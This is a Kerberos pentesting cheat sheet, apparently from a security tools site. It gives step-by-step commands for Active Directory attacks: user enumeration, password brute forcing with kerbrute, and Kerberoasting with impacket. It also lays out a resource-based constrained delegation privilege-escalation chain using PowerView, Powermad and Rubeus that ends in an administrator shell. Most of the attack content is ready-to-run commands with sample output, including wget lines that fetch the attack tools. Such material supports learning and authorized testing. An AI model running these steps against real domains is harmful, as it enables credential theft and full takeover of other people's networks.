Kerberos Pentesting

Last modified: 2023-08-26

Active Directory Privilege Escalation Windows

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.

Enumeration

To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc 10.0.0.1 -d example.domain passwords.txt username

Also, see AS-REP Roasting to find password hashes.

Kerberoasting Attack

Kerberoasting is a attack technique to crack passwords in Active Directory using a credential already gathered.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt

Privilege Escalation with Kerberos

First off, download two PS scripts in local machine..

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

1. Check User's Permission and Windows Versions

Check if users are allowed to create a new computer object on the domain.

Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com

# -------------------------
# Result
ms-ds-machineaccountquota: 10

And check if the machine is at least Windows Server 2012.

Get-DomainController

# -------------------------
# Result
OSVersion: Windows Server 2022 Standard

Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

hostname
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103

Create a new raw security descriptor.

# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose

3. Impersonate to Get a Ticket

Download Rubeus.exe in local machine.

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Then upload it to the target machine and generate a RC4 hash.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

We can request a Kerberos ticket for a new machine account while impersonating an administrator.

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt

# --------------
# Result (copy the output long hash at the last)

Then generate a ticket (.kirbi).

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi

4. Make the Ticket Usable and Use It

Download “ticket_converter.py”.

wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py

Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We can use the ticket to get a shell.

impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k

Exploits related to Windows

Active Directory

Protocol

Privilege Escalation

Post Exploitation

PowerShell

Others

Kerberos Pentesting

Tools by HDKS